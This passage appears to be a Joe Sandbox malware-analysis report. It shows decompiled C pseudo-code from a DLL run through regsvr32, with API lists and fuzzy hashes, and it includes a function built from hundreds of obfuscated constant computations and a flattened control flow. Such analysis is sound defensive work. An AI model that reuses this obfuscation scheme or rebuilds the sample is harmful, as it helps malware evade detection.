                                                                                                                				void* _t100;
                                                                                                                				CHAR* _t106;
                                                                                                                
                                                                                                                				_t94 = __esi;
                                                                                                                				_t90 = __edx;
                                                                                                                				_t76 = __ecx;
                                                                                                                				_t1 = _t100 - 0x13c; // -120
                                                                                                                				_t98 = _t1;
                                                                                                                				_t38 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t98 + 0x140) = _t38 ^ _t98;
                                                                                                                				_push(0x14);
                                                                                                                				E1003D1E6(E10053476, __ebx, __edi, __esi);
                                                                                                                				_t92 =  *(_t98 + 0x14c);
                                                                                                                				_t74 =  *(_t98 + 0x150);
                                                                                                                				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
                                                                                                                				_t106 = _t92;
                                                                                                                				_t107 = _t106 == 0;
                                                                                                                				if(_t106 == 0) {
                                                                                                                					L1:
                                                                                                                					E1001729E(_t74, _t76, _t92, _t94, _t107);
                                                                                                                				}
                                                                                                                				if((0 | _t74 != 0x00000000) == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				_t11 = _t98 - 0x14; // -140
                                                                                                                				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t11);
                                                                                                                				if(_t49 != 0) {
                                                                                                                					__eflags = _t49 - 0x104;
                                                                                                                					if(_t49 >= 0x104) {
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						_t52 = E100173A6();
                                                                                                                						_t13 = _t98 - 0x10; // -136
                                                                                                                						E10001050(_t13, _t90, _t52);
                                                                                                                						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                                                                                                                						_t16 = _t98 - 0x10; // -136
                                                                                                                						E10020684(_t74, _t98, __eflags, _t92, _t16);
                                                                                                                						_t56 = PathIsUNCA( *(_t98 - 0x10));
                                                                                                                						__eflags = _t56;
                                                                                                                						if(_t56 != 0) {
                                                                                                                							L19:
                                                                                                                							E10001020( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                                                                                							_t50 = 1;
                                                                                                                							__eflags = 1;
                                                                                                                						} else {
                                                                                                                							_t18 = _t98 - 0x1c; // -148
                                                                                                                							_t19 = _t98 - 0x20; // -152
                                                                                                                							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t19, _t18, _t56, _t56);
                                                                                                                							__eflags = _t59;
                                                                                                                							if(_t59 != 0) {
                                                                                                                								__eflags =  *(_t98 - 0x1c) & 0x00000002;
                                                                                                                								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
                                                                                                                									CharUpperA(_t92);
                                                                                                                								}
                                                                                                                								__eflags =  *(_t98 - 0x1c) & 0x00000004;
                                                                                                                								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
                                                                                                                									goto L19;
                                                                                                                								} else {
                                                                                                                									_t61 = FindFirstFileA(_t74, _t98);
                                                                                                                									__eflags = _t61 - 0xffffffff;
                                                                                                                									if(_t61 == 0xffffffff) {
                                                                                                                										goto L19;
                                                                                                                									} else {
                                                                                                                										FindClose(_t61);
                                                                                                                										__eflags =  *(_t98 - 0x14);
                                                                                                                										if( *(_t98 - 0x14) == 0) {
                                                                                                                											goto L10;
                                                                                                                										} else {
                                                                                                                											__eflags =  *(_t98 - 0x14) - _t92;
                                                                                                                											if( *(_t98 - 0x14) <= _t92) {
                                                                                                                												goto L10;
                                                                                                                											} else {
                                                                                                                												_t31 =  &(_t98->cFileName); // -76
                                                                                                                												_t65 = lstrlenA(_t31);
                                                                                                                												_t89 =  *(_t98 - 0x14) - _t92;
                                                                                                                												__eflags = _t65 + _t89 - 0x104;
                                                                                                                												if(_t65 + _t89 >= 0x104) {
                                                                                                                													goto L10;
                                                                                                                												} else {
                                                                                                                													_t33 =  &(_t98->cFileName); // -76
                                                                                                                													_t97 = 0x104 - _t89;
                                                                                                                													__eflags = 0x104 - _t89;
                                                                                                                													E100202D5(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97, _t33);
                                                                                                                													goto L19;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_push(_t74);
                                                                                                                								E10020823(_t90, _t92,  *((intOrPtr*)(_t98 - 0x18)));
                                                                                                                								L10:
                                                                                                                								E10001020( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                                                                                								goto L5;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					E10017042(_t74, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
                                                                                                                					_push(_t74);
                                                                                                                					E10020823(_t90, _t92,  *((intOrPtr*)(_t98 - 0x18)));
                                                                                                                					L5:
                                                                                                                					_t50 = 0;
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
                                                                                                                				_pop(_t93);
                                                                                                                				_pop(_t96);
                                                                                                                				_pop(_t75);
                                                                                                                				return E1003B437(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002086D
                                                                                                                • GetFullPathNameA.KERNEL32(?,00000104,?,-0000008C,00000014,?,-000000F8,10020AA1,-00000160,?,?,?,00000000), ref: 100208AE
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • PathIsUNCA.SHLWAPI(?), ref: 100208F8
                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 10020916
                                                                                                                • CharUpperA.USER32 ref: 1002093D
                                                                                                                • FindFirstFileA.KERNEL32(?,00000000,?,-000000F8,10020AA1,-00000160,?,?,?,00000000), ref: 1002094E
                                                                                                                • FindClose.KERNEL32(00000000,?,-000000F8,10020AA1,-00000160,?,?,?,00000000), ref: 1002095A
                                                                                                                • lstrlenA.KERNEL32(-0000004C,?,-000000F8,10020AA1,-00000160,?,?,?,00000000), ref: 1002096F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4099955704-0
                                                                                                                • Opcode ID: 8608b49f40986e44812c40144a83824b224115d6aa1f6d9be985fb01b9d35b3d
                                                                                                                • Instruction ID: 764d7a462618b0f06848026864ba4b2df67a22439e302d94f0936d83bf202709
                                                                                                                • Opcode Fuzzy Hash: 8608b49f40986e44812c40144a83824b224115d6aa1f6d9be985fb01b9d35b3d
                                                                                                                • Instruction Fuzzy Hash: 7941C371A0025AAFEB11DBB0DC85BFF77BEEF04354F404529F816E2292EB349D448A60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001BAF0B(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v24;
                                                                                                                				char _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				unsigned int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				signed int _v184;
                                                                                                                				signed int _v188;
                                                                                                                				signed int _v192;
                                                                                                                				signed int _v196;
                                                                                                                				signed int _v200;
                                                                                                                				signed int _v204;
                                                                                                                				signed int _v208;
                                                                                                                				signed int _v212;
                                                                                                                				signed int _v216;
                                                                                                                				signed int _v220;
                                                                                                                				signed int _v224;
                                                                                                                				signed int _v228;
                                                                                                                				signed int _v232;
                                                                                                                				signed int _v236;
                                                                                                                				signed int _v240;
                                                                                                                				signed int _v244;
                                                                                                                				signed int _v248;
                                                                                                                				signed int _v252;
                                                                                                                				signed int _v256;
                                                                                                                				signed int _v260;
                                                                                                                				signed int _v264;
                                                                                                                				intOrPtr _v268;
                                                                                                                				signed int _v272;
                                                                                                                				signed int _v276;
                                                                                                                				signed int _v280;
                                                                                                                				signed int _v284;
                                                                                                                				signed int _v288;
                                                                                                                				signed int _v292;
                                                                                                                				signed int _v296;
                                                                                                                				signed int _v300;
                                                                                                                				signed int _v304;
                                                                                                                				signed int _v308;
                                                                                                                				signed int _v312;
                                                                                                                				signed int _v316;
                                                                                                                				signed int _v320;
                                                                                                                				signed int _v324;
                                                                                                                				void* _t605;
                                                                                                                				intOrPtr _t650;
                                                                                                                				void* _t651;
                                                                                                                				void* _t655;
                                                                                                                				void* _t657;
                                                                                                                				void* _t665;
                                                                                                                				void* _t667;
                                                                                                                				void* _t672;
                                                                                                                				void* _t677;
                                                                                                                				intOrPtr _t682;
                                                                                                                				void* _t728;
                                                                                                                				void* _t744;
                                                                                                                				signed int _t746;
                                                                                                                				signed int _t747;
                                                                                                                				signed int _t748;
                                                                                                                				signed int _t749;
                                                                                                                				signed int _t750;
                                                                                                                				signed int _t751;
                                                                                                                				signed int _t752;
                                                                                                                				signed int _t753;
                                                                                                                				signed int _t754;
                                                                                                                				signed int _t755;
                                                                                                                				signed int _t756;
                                                                                                                				signed int _t757;
                                                                                                                				void* _t758;
                                                                                                                				intOrPtr _t761;
                                                                                                                				signed int* _t763;
                                                                                                                				signed int* _t767;
                                                                                                                				void* _t770;
                                                                                                                
                                                                                                                				_t682 = __ecx;
                                                                                                                				_push(0x20);
                                                                                                                				_push(_a20);
                                                                                                                				_v268 = __ecx;
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t605);
                                                                                                                				_v20 = 0xbfa34d;
                                                                                                                				_t761 = 0;
                                                                                                                				_v16 = 0xfce444;
                                                                                                                				_t763 =  &(( &_v324)[8]);
                                                                                                                				_v12 = 0x8a6c8a;
                                                                                                                				_v8 = 0;
                                                                                                                				_t677 = 0xce5d081;
                                                                                                                				_v316 = 0x13f24f;
                                                                                                                				_v316 = _v316 | 0xe1b32d13;
                                                                                                                				_v316 = _v316 ^ 0x2f76fc63;
                                                                                                                				_v316 = _v316 >> 6;
                                                                                                                				_v316 = _v316 ^ 0x033b140c;
                                                                                                                				_v76 = 0xd74768;
                                                                                                                				_v76 = _v76 + 0x83a7;
                                                                                                                				_v76 = _v76 ^ 0x00d7cb0f;
                                                                                                                				_v144 = 0xc94ad1;
                                                                                                                				_v144 = _v144 ^ 0x88868301;
                                                                                                                				_v144 = _v144 ^ 0x884fc9d0;
                                                                                                                				_v120 = 0x57cb78;
                                                                                                                				_t746 = 0x1c;
                                                                                                                				_v120 = _v120 / _t746;
                                                                                                                				_v120 = _v120 ^ 0x000322b2;
                                                                                                                				_v108 = 0xea57b7;
                                                                                                                				_v108 = _v108 >> 9;
                                                                                                                				_v108 = _v108 ^ 0x0000752b;
                                                                                                                				_v116 = 0x8cb900;
                                                                                                                				_t747 = 0x2c;
                                                                                                                				_v116 = _v116 * 7;
                                                                                                                				_v116 = _v116 ^ 0x03d90f00;
                                                                                                                				_v52 = 0x617f71;
                                                                                                                				_v52 = _v52 + 0xffff447f;
                                                                                                                				_v52 = _v52 ^ 0x0060c3f0;
                                                                                                                				_v132 = 0x16826f;
                                                                                                                				_v132 = _v132 / _t747;
                                                                                                                				_v132 = _v132 ^ 0x000082f6;
                                                                                                                				_v164 = 0x7969b3;
                                                                                                                				_v164 = _v164 ^ 0xa0ef9d20;
                                                                                                                				_v164 = _v164 ^ 0xa096f493;
                                                                                                                				_v180 = 0xd63d59;
                                                                                                                				_v180 = _v180 >> 0xf;
                                                                                                                				_v180 = _v180 + 0xffffc5be;
                                                                                                                				_v180 = _v180 ^ 0xffffc76a;
                                                                                                                				_v44 = 0x3c2c33;
                                                                                                                				_v44 = _v44 + 0xffffbe1e;
                                                                                                                				_v44 = _v44 ^ 0x003bea51;
                                                                                                                				_v252 = 0x8d3c7d;
                                                                                                                				_v252 = _v252 | 0xc572c0eb;
                                                                                                                				_t748 = 0x79;
                                                                                                                				_v252 = _v252 / _t748;
                                                                                                                				_v252 = _v252 ^ 0x01a2e8b3;
                                                                                                                				_v148 = 0x7e9d70;
                                                                                                                				_v148 = _v148 * 0x7e;
                                                                                                                				_v148 = _v148 ^ 0x3e5aa374;
                                                                                                                				_v272 = 0x7ab385;
                                                                                                                				_t749 = 0x56;
                                                                                                                				_v272 = _v272 * 0x16;
                                                                                                                				_v272 = _v272 + 0xffff4a7c;
                                                                                                                				_v272 = _v272 << 0xe;
                                                                                                                				_v272 = _v272 ^ 0xadfea699;
                                                                                                                				_v296 = 0x1e04b4;
                                                                                                                				_v296 = _v296 | 0xe6b1dfc4;
                                                                                                                				_v296 = _v296 + 0xffff6f85;
                                                                                                                				_v296 = _v296 / _t749;
                                                                                                                				_v296 = _v296 ^ 0x02a65527;
                                                                                                                				_v264 = 0x88168e;
                                                                                                                				_t750 = 0x4a;
                                                                                                                				_v264 = _v264 * 0x7b;
                                                                                                                				_v264 = _v264 >> 7;
                                                                                                                				_v264 = _v264 >> 6;
                                                                                                                				_v264 = _v264 ^ 0x000d8876;
                                                                                                                				_v84 = 0xeb11ed;
                                                                                                                				_v84 = _v84 + 0xffff790d;
                                                                                                                				_v84 = _v84 ^ 0x00e8976b;
                                                                                                                				_v288 = 0xc59d24;
                                                                                                                				_v288 = _v288 << 0x10;
                                                                                                                				_v288 = _v288 ^ 0xfccf2b86;
                                                                                                                				_v288 = _v288 + 0xffff89e1;
                                                                                                                				_v288 = _v288 ^ 0x61edcbb3;
                                                                                                                				_v228 = 0xc63f4d;
                                                                                                                				_v228 = _v228 + 0xffffd388;
                                                                                                                				_v228 = _v228 + 0xfffffd3a;
                                                                                                                				_v228 = _v228 ^ 0x00c8b1bc;
                                                                                                                				_v204 = 0x5d4e11;
                                                                                                                				_v204 = _v204 | 0x95f451bd;
                                                                                                                				_v204 = _v204 >> 5;
                                                                                                                				_v204 = _v204 ^ 0x04ac2697;
                                                                                                                				_v172 = 0x415b79;
                                                                                                                				_v172 = _v172 + 0xffff3f51;
                                                                                                                				_v172 = _v172 ^ 0x004a711a;
                                                                                                                				_v324 = 0x1faf76;
                                                                                                                				_v324 = _v324 / _t750;
                                                                                                                				_v324 = _v324 + 0x6f96;
                                                                                                                				_v324 = _v324 << 0x10;
                                                                                                                				_v324 = _v324 ^ 0xdd38103c;
                                                                                                                				_v48 = 0x3dd7d6;
                                                                                                                				_v48 = _v48 | 0x3e8624f0;
                                                                                                                				_v48 = _v48 ^ 0x3eb1b039;
                                                                                                                				_v140 = 0x32e100;
                                                                                                                				_v140 = _v140 * 0x27;
                                                                                                                				_v140 = _v140 ^ 0x07c62d9d;
                                                                                                                				_v56 = 0x14a539;
                                                                                                                				_v56 = _v56 << 6;
                                                                                                                				_v56 = _v56 ^ 0x052ec169;
                                                                                                                				_v220 = 0x4e84cf;
                                                                                                                				_v220 = _v220 + 0xbb56;
                                                                                                                				_v220 = _v220 | 0x88fe6515;
                                                                                                                				_v220 = _v220 ^ 0x88feb6c3;
                                                                                                                				_v188 = 0x57e5d0;
                                                                                                                				_v188 = _v188 + 0xffffe5f4;
                                                                                                                				_v188 = _v188 + 0x51de;
                                                                                                                				_v188 = _v188 ^ 0x00593e3e;
                                                                                                                				_v124 = 0xda876f;
                                                                                                                				_v124 = _v124 + 0x1f26;
                                                                                                                				_v124 = _v124 ^ 0x00d6dd7c;
                                                                                                                				_v244 = 0x227fef;
                                                                                                                				_v244 = _v244 ^ 0x95219bbf;
                                                                                                                				_v244 = _v244 >> 0xd;
                                                                                                                				_v244 = _v244 ^ 0x0004fd1c;
                                                                                                                				_v212 = 0x58955c;
                                                                                                                				_v212 = _v212 >> 0xf;
                                                                                                                				_v212 = _v212 | 0xf31a6d07;
                                                                                                                				_v212 = _v212 ^ 0xf31d7d11;
                                                                                                                				_v308 = 0xef0159;
                                                                                                                				_v308 = _v308 + 0xffffa670;
                                                                                                                				_v308 = _v308 ^ 0xf3f3a861;
                                                                                                                				_v308 = _v308 | 0x4efb3e99;
                                                                                                                				_v308 = _v308 ^ 0xfff432a6;
                                                                                                                				_v196 = 0x60905e;
                                                                                                                				_v196 = _v196 + 0x6bd4;
                                                                                                                				_t751 = 0x48;
                                                                                                                				_v196 = _v196 * 0x13;
                                                                                                                				_v196 = _v196 ^ 0x0731c03a;
                                                                                                                				_v152 = 0xfe5ccd;
                                                                                                                				_v152 = _v152 << 1;
                                                                                                                				_v152 = _v152 ^ 0x01f6c1e2;
                                                                                                                				_v160 = 0xa5d5e4;
                                                                                                                				_v160 = _v160 + 0x16d5;
                                                                                                                				_v160 = _v160 ^ 0x00a2f9b6;
                                                                                                                				_v200 = 0x14d0d1;
                                                                                                                				_v200 = _v200 ^ 0xd5fbe661;
                                                                                                                				_v200 = _v200 ^ 0x5a7cfcf7;
                                                                                                                				_v200 = _v200 ^ 0x8f998887;
                                                                                                                				_v168 = 0x64e175;
                                                                                                                				_v168 = _v168 + 0xffff6898;
                                                                                                                				_v168 = _v168 ^ 0x006b4d34;
                                                                                                                				_v128 = 0x96781a;
                                                                                                                				_v128 = _v128 | 0x9f7be4dd;
                                                                                                                				_v128 = _v128 ^ 0x9ff57e3a;
                                                                                                                				_v136 = 0xd3003f;
                                                                                                                				_v136 = _v136 / _t751;
                                                                                                                				_v136 = _v136 ^ 0x00086659;
                                                                                                                				_v284 = 0xa8c03d;
                                                                                                                				_v284 = _v284 + 0x63a9;
                                                                                                                				_v284 = _v284 + 0x9a8e;
                                                                                                                				_v284 = _v284 + 0xffff3034;
                                                                                                                				_v284 = _v284 ^ 0x00aeae44;
                                                                                                                				_v192 = 0x725534;
                                                                                                                				_v192 = _v192 >> 2;
                                                                                                                				_v192 = _v192 | 0xf5d012a3;
                                                                                                                				_v192 = _v192 ^ 0xf5d4cb4b;
                                                                                                                				_v292 = 0xf873eb;
                                                                                                                				_v292 = _v292 << 9;
                                                                                                                				_v292 = _v292 | 0xf14de7fd;
                                                                                                                				_v292 = _v292 ^ 0xf1e3b9de;
                                                                                                                				_v96 = 0x553d1c;
                                                                                                                				_v96 = _v96 + 0xd0f2;
                                                                                                                				_v96 = _v96 ^ 0x00538e7c;
                                                                                                                				_v104 = 0xe7a1df;
                                                                                                                				_v104 = _v104 + 0xffff2622;
                                                                                                                				_v104 = _v104 ^ 0x00e471b4;
                                                                                                                				_v276 = 0x85d157;
                                                                                                                				_v276 = _v276 ^ 0x77f80d5d;
                                                                                                                				_t752 = 0x5a;
                                                                                                                				_v276 = _v276 / _t752;
                                                                                                                				_v276 = _v276 + 0x59de;
                                                                                                                				_v276 = _v276 ^ 0x015a4f70;
                                                                                                                				_v112 = 0xcc5f93;
                                                                                                                				_t753 = 0x6b;
                                                                                                                				_v112 = _v112 / _t753;
                                                                                                                				_v112 = _v112 ^ 0x000186ab;
                                                                                                                				_v72 = 0xf61229;
                                                                                                                				_v72 = _v72 << 0xc;
                                                                                                                				_v72 = _v72 ^ 0x61205fdf;
                                                                                                                				_v80 = 0x8c2d30;
                                                                                                                				_v80 = _v80 >> 0xf;
                                                                                                                				_v80 = _v80 ^ 0x00057b99;
                                                                                                                				_v184 = 0x9464e1;
                                                                                                                				_v184 = _v184 | 0x19a6b3d0;
                                                                                                                				_v184 = _v184 << 2;
                                                                                                                				_v184 = _v184 ^ 0x66d456ed;
                                                                                                                				_v88 = 0x92a103;
                                                                                                                				_v88 = _v88 | 0x23c05aae;
                                                                                                                				_v88 = _v88 ^ 0x23df96d7;
                                                                                                                				_v68 = 0xa07946;
                                                                                                                				_t754 = 5;
                                                                                                                				_v68 = _v68 / _t754;
                                                                                                                				_v68 = _v68 ^ 0x002378d7;
                                                                                                                				_v224 = 0x24e9af;
                                                                                                                				_t755 = 9;
                                                                                                                				_v224 = _v224 * 0x6f;
                                                                                                                				_v224 = _v224 + 0xffffeeb9;
                                                                                                                				_v224 = _v224 ^ 0x10070dbc;
                                                                                                                				_v232 = 0x9d5ea3;
                                                                                                                				_v232 = _v232 + 0xffffb05d;
                                                                                                                				_v232 = _v232 << 8;
                                                                                                                				_v232 = _v232 ^ 0x9d0fa184;
                                                                                                                				_v300 = 0xa6177d;
                                                                                                                				_v300 = _v300 >> 0xb;
                                                                                                                				_v300 = _v300 << 2;
                                                                                                                				_v300 = _v300 + 0xfffff94d;
                                                                                                                				_v300 = _v300 ^ 0x0000e226;
                                                                                                                				_v240 = 0x7363f7;
                                                                                                                				_v240 = _v240 + 0x1de2;
                                                                                                                				_v240 = _v240 + 0x9216;
                                                                                                                				_v240 = _v240 ^ 0x007c5529;
                                                                                                                				_v280 = 0x8d6799;
                                                                                                                				_v280 = _v280 | 0x967ed287;
                                                                                                                				_v280 = _v280 * 0x7e;
                                                                                                                				_v280 = _v280 / _t755;
                                                                                                                				_v280 = _v280 ^ 0x091534b6;
                                                                                                                				_v312 = 0xd87472;
                                                                                                                				_v312 = _v312 | 0x97127034;
                                                                                                                				_v312 = _v312 << 5;
                                                                                                                				_v312 = _v312 | 0x0fb1eee4;
                                                                                                                				_v312 = _v312 ^ 0xfff36608;
                                                                                                                				_v176 = 0xc4edd1;
                                                                                                                				_v176 = _v176 >> 6;
                                                                                                                				_t756 = 0x2e;
                                                                                                                				_v176 = _v176 * 0x16;
                                                                                                                				_v176 = _v176 ^ 0x0045a18c;
                                                                                                                				_v236 = 0xa889f9;
                                                                                                                				_v236 = _v236 | 0xf5c1a96a;
                                                                                                                				_v236 = _v236 ^ 0x03084e05;
                                                                                                                				_v236 = _v236 ^ 0xf6e5b847;
                                                                                                                				_v156 = 0x1f64cb;
                                                                                                                				_v156 = _v156 + 0xffff6e2a;
                                                                                                                				_v156 = _v156 ^ 0x00149b18;
                                                                                                                				_v304 = 0xe03fce;
                                                                                                                				_v304 = _v304 + 0x8ffa;
                                                                                                                				_v304 = _v304 * 0x6a;
                                                                                                                				_v304 = _v304 / _t756;
                                                                                                                				_v304 = _v304 ^ 0x020711fd;
                                                                                                                				_v92 = 0xd41708;
                                                                                                                				_v92 = _v92 * 0x13;
                                                                                                                				_v92 = _v92 ^ 0x0fb104ed;
                                                                                                                				_v60 = 0xde188;
                                                                                                                				_v60 = _v60 | 0xa7a9e015;
                                                                                                                				_v60 = _v60 ^ 0xa7a876b9;
                                                                                                                				_v208 = 0x4a0bde;
                                                                                                                				_v208 = _v208 * 0x79;
                                                                                                                				_v208 = _v208 * 0x28;
                                                                                                                				_v208 = _v208 ^ 0x77fb7868;
                                                                                                                				_v100 = 0x723f69;
                                                                                                                				_v100 = _v100 >> 0xe;
                                                                                                                				_v100 = _v100 ^ 0x000cee5f;
                                                                                                                				_t744 = 0x6db7fd8;
                                                                                                                				_v216 = 0xd709df;
                                                                                                                				_v216 = _v216 << 0xc;
                                                                                                                				_v216 = _v216 | 0x02074724;
                                                                                                                				_v216 = _v216 ^ 0x7290135f;
                                                                                                                				_v256 = 0xe59e46;
                                                                                                                				_v256 = _v256 >> 0xb;
                                                                                                                				_v256 = _v256 + 0xffff652d;
                                                                                                                				_t757 = 0x69;
                                                                                                                				_t758 = 0x3791d1a;
                                                                                                                				_v256 = _v256 / _t757;
                                                                                                                				_v256 = _v256 ^ 0x02777912;
                                                                                                                				_v320 = 0x3b8273;
                                                                                                                				_v320 = _v320 * 0x72;
                                                                                                                				_v320 = _v320 << 7;
                                                                                                                				_v320 = _v320 + 0xc85f;
                                                                                                                				_v320 = _v320 ^ 0x400a70c2;
                                                                                                                				_v64 = 0xbe5655;
                                                                                                                				_v64 = _v64 >> 3;
                                                                                                                				_v64 = _v64 ^ 0x0019b7c7;
                                                                                                                				_v248 = 0xa173cd;
                                                                                                                				_v248 = _v248 | 0x0b03dc08;
                                                                                                                				_v248 = _v248 << 0xf;
                                                                                                                				_v248 = _v248 ^ 0xffebb607;
                                                                                                                				_v260 = 0x812e2f;
                                                                                                                				_v260 = _v260 << 4;
                                                                                                                				_v260 = _v260 | 0xf9ae6005;
                                                                                                                				_v260 = _v260 << 8;
                                                                                                                				_v260 = _v260 ^ 0xbee91bc8;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					while(1) {
                                                                                                                						_t728 = 0xb24d068;
                                                                                                                						do {
                                                                                                                							while(1) {
                                                                                                                								L3:
                                                                                                                								_t770 = _t677 - _t744;
                                                                                                                								if(_t770 <= 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								__eflags = _t677 - _t728;
                                                                                                                								if(_t677 == _t728) {
                                                                                                                									_push(_t682);
                                                                                                                									_t650 = E001A303A(_t682, _v28);
                                                                                                                									_t763 =  &(_t763[3]);
                                                                                                                									_v32 = _t650;
                                                                                                                									__eflags = _t650;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t677 = _t744;
                                                                                                                										goto L27;
                                                                                                                									} else {
                                                                                                                										_t677 = 0x2ddff79;
                                                                                                                										goto L11;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									__eflags = _t677 - 0xce5d081;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t677 = 0x3040d11;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										__eflags = _t677 - 0xcffed49;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_push(_v168);
                                                                                                                											_push(0x1a14e4);
                                                                                                                											_push(_v200);
                                                                                                                											_t672 = E001AEB4B( &_v28, _v128, _v136, _v284, _v192, _v292,  &_v24, _v144, E001BF5D9(_v152, _v160, __eflags), _v36);
                                                                                                                											_t767 =  &(_t763[0xc]);
                                                                                                                											__eflags = _t672 - _v120;
                                                                                                                											_t677 =  ==  ? 0xb24d068 : _t744;
                                                                                                                											E001BF94B(_t670, _v96, _v104, _v276, _v112);
                                                                                                                											L15:
                                                                                                                											_t763 =  &(_t767[3]);
                                                                                                                											_t758 = 0x3791d1a;
                                                                                                                											L27:
                                                                                                                											_t682 = _v268;
                                                                                                                											_t651 = 0x583810f;
                                                                                                                											_t728 = 0xb24d068;
                                                                                                                											goto L28;
                                                                                                                										} else {
                                                                                                                											__eflags = _t677 - 0xd17ebbc;
                                                                                                                											if(_t677 != 0xd17ebbc) {
                                                                                                                												goto L28;
                                                                                                                											} else {
                                                                                                                												E001A4F68(_v60, _v40, _v208, _v100, _v216);
                                                                                                                												_t763 =  &(_t763[3]);
                                                                                                                												_t677 = 0x6a74054;
                                                                                                                												L11:
                                                                                                                												_t682 = _v268;
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L31:
                                                                                                                								return _t761;
                                                                                                                							}
                                                                                                                							if(_t770 == 0) {
                                                                                                                								E001B2519(_v64, _v36, _v248, _v252, _v260);
                                                                                                                							} else {
                                                                                                                								if(_t677 == 0x2ddff79) {
                                                                                                                									_push(_t682);
                                                                                                                									_t655 = E001A500A(_v28, _v108, _v36, _v68,  &_v40, _v224, _v116, _v232, _v300, _v32, _v240);
                                                                                                                									_t763 =  &(_t763[0xa]);
                                                                                                                									__eflags = _t655 - _v52;
                                                                                                                									_t682 = _v268;
                                                                                                                									_t651 = 0x583810f;
                                                                                                                									_t677 =  ==  ? 0x583810f : 0x6a74054;
                                                                                                                									_t728 = 0xb24d068;
                                                                                                                									goto L3;
                                                                                                                								} else {
                                                                                                                									if(_t677 == 0x3040d11) {
                                                                                                                										_push(_v264);
                                                                                                                										_push(0x1a1574);
                                                                                                                										_push(_v296);
                                                                                                                										_t657 = E001BF5D9(_v148, _v272, __eflags);
                                                                                                                										_push(_v204);
                                                                                                                										_push(0x1a1504);
                                                                                                                										_push(_v228);
